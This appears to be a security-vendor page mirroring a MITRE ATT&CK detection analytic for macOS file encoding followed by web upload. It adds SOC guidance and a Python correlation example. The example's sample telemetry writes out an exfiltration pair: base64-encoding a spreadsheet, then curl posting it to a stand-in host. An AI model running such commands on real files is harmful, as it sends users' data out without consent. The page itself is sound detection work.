MITRE ATT&CK® Analytic

AN0304: Analytic 0304

Processes use built-in encoding utilities (e.g., `base64`, `xxd`, or `plutil`) to encode file contents followed by HTTP/HTTPS transfer via curl or custom applications.

Enterprise | AN0304 | Analytic | Object v1.0 | Modified
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

This analytic matters because it describes a macOS data-handling pattern that can turn ordinary built-in tools into a potential exfiltration signal: file contents are encoded with utilities such as base64, xxd, or plutil and then transferred over HTTP or HTTPS using curl or a custom application. For leaders, the practical question is whether the organization can distinguish legitimate automation and administration from unusual file encoding followed by outbound web transfer.

Executive priority

Prioritize this as a validation item for macOS visibility, data-loss investigation readiness, and SOC triage quality. The behavior uses common tools and standard web protocols, so control value depends less on blocking a single binary and more on having reliable endpoint process telemetry, outbound network evidence, and a clear baseline for approved scripts, developers, administrators, and applications that legitimately encode and transmit data.

Technical view

For SOC and detection teams, validate whether macOS endpoint telemetry can correlate process execution of built-in encoding utilities such as base64, xxd, or plutil with subsequent HTTP/HTTPS transfer activity by curl or non-standard/custom applications. Because no official detection logic is supplied and no ATT&CK tactic is specified, treat this as a behavior-correlation analytic rather than a standalone alert. Useful triage context includes parent process, command-line arguments where available, encoded file paths, destination domain or IP, user identity, working directory, signing/notarization status of the transferring application where collected, and whether the activity matches approved automation.

Likely telemetry

  • macOS process creation events for base64, xxd, plutil, curl, and custom applications
  • Command-line arguments and parent-child process relationships where available
  • File access or file read events for encoded content where available
  • HTTP/HTTPS outbound connection metadata, including destination host, IP, port, URL or SNI where collected
  • User, host, working directory, and process metadata for correlation

Detection direction

  • Build or validate correlation between local encoding utilities and near-time outbound HTTP/HTTPS transfer from the same user, host, process tree, or script context.
  • Tune against expected macOS administrative, developer, CI/CD, backup, logging, and support workflows that may legitimately encode files and send them over web protocols.
  • Pay attention to custom or uncommon applications performing the transfer after encoding activity, since the official description explicitly includes curl or custom applications.
  • Do not rely only on network controls: HTTPS may limit content inspection, and curl/custom apps may blend into normal outbound web traffic.
  • Do not rely only on individual process names: base64, xxd, plutil, and curl are legitimate built-in or common utilities, so context and sequence are essential.
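A correlation of the kind these points describe, as an added example written for this page (it is not Glexia or MITRE code): it pairs macOS process events for base64, xxd or plutil with a near-time outbound HTTP/HTTPS transfer by curl or another process from the same host and user, records whether the two share a process tree, and tunes out an approved automation parent. The event schema, the 120-second window, the allowlisted backup-agent path and every sample host, user and destination are constructed assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta

ENCODERS = {"base64", "xxd", "plutil"}
WINDOW = timedelta(seconds=120)
# Constructed tuning allowlist: parent executables approved to encode and upload.
APPROVED_PARENTS = {"/usr/local/bin/backup-agent"}

@dataclass
class ProcEvent:
    ts: datetime
    host: str
    user: str
    ppid: int        # parent pid, used as the process-tree key
    name: str
    parent_path: str
    cmdline: str
    dest: str = ""   # destination host of an outbound HTTP/HTTPS connection, if any

def correlate(events):
    """Pair each encoding-utility execution with outbound HTTP/HTTPS activity within
    WINDOW on the same host and user; suppress approved automation process trees."""
    alerts = []
    for enc in (e for e in events if e.name in ENCODERS):
        for x in events:
            if not x.dest or not (enc.ts <= x.ts <= enc.ts + WINDOW):
                continue   # not a web transfer, or outside the correlation window
            if (x.host, x.user) != (enc.host, enc.user):
                continue
            same_tree = x.ppid == enc.ppid
            if same_tree and x.parent_path in APPROVED_PARENTS:
                continue   # baseline tuning: known backup/CI/admin workflow
            alerts.append({"host": enc.host, "user": enc.user, "encoder": enc.cmdline,
                           "transfer": "curl" if x.name == "curl" else f"custom:{x.name}",
                           "dest": x.dest, "same_tree": same_tree,
                           "lag_s": (x.ts - enc.ts).total_seconds()})
    return alerts

T, S = datetime(2025, 1, 15, 10, 0, 0), timedelta(seconds=1)
# Constructed sample telemetry (hosts, users, paths and destinations are made up).
SAMPLE_EVENTS = [
    ProcEvent(T, "mac-01", "alice", 400, "base64", "/bin/zsh",
              "base64 -i Documents/q3.xlsx -o /tmp/q3.b64"),
    ProcEvent(T + 31 * S, "mac-01", "alice", 400, "curl", "/bin/zsh",
              "curl --data-binary @/tmp/q3.b64 https://files.example/up", dest="files.example"),
    ProcEvent(T + 300 * S, "mac-02", "bob", 550, "plutil", "/usr/local/bin/backup-agent",
              "plutil -convert xml1 -o /tmp/p.xml prefs.plist"),
    ProcEvent(T + 309 * S, "mac-02", "bob", 550, "curl", "/usr/local/bin/backup-agent",
              "curl -T /tmp/p.xml https://backup.corp.example/", dest="backup.corp.example"),
    ProcEvent(T + 600 * S, "mac-03", "carol", 700, "xxd", "/bin/bash", "xxd -p notes.txt"),
]
```

Only the mac-01 pair is reported: the mac-02 pair shares an approved parent and is tuned out, and the mac-03 encoding has no transfer within the window.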

Mitigation priorities

  • Confirm macOS endpoint logging coverage for process execution, command-line capture, file activity, and outbound network metadata.
  • Define approved business use cases for file encoding and web transfer, especially for administrators, developers, automation accounts, and support tooling.
  • Apply least-privilege and data access controls so users and processes cannot freely read sensitive files not required for their role.
  • Use egress governance appropriate to the environment, including review of destinations and applications permitted to send outbound HTTP/HTTPS traffic.
  • Document expected telemetry and investigation steps as compliance and incident-response evidence for data movement and exfiltration investigations.

Analyst notes and limits

The supplied object is a detection analytic for macOS only. It describes a pattern of encoding file contents with built-in utilities followed by HTTP/HTTPS transfer. No tactic, relationship context, or official detection procedure is provided, so this take emphasizes validation, telemetry readiness, and correlation design rather than a specific rule.

Source fields are sparse: there are no relationships, no official detection text, no named ATT&CK technique in the supplied context, and no evidence of active exploitation or attribution. Local baselines are required to separate legitimate encoding and transfer workflows from suspicious activity.

Official MITRE ATT&CK definition

Analytic 0304

Processes use built-in encoding utilities (e.g., `base64`, `xxd`, or `plutil`) to encode file contents followed by HTTP/HTTPS transfer via curl or custom applications.

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 1609d1f3d0f793ac...

Imported snapshots across ATT&CK releases (1)

| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 1609d1f3d0f7… |

Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack: AN0304 (source URL)

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.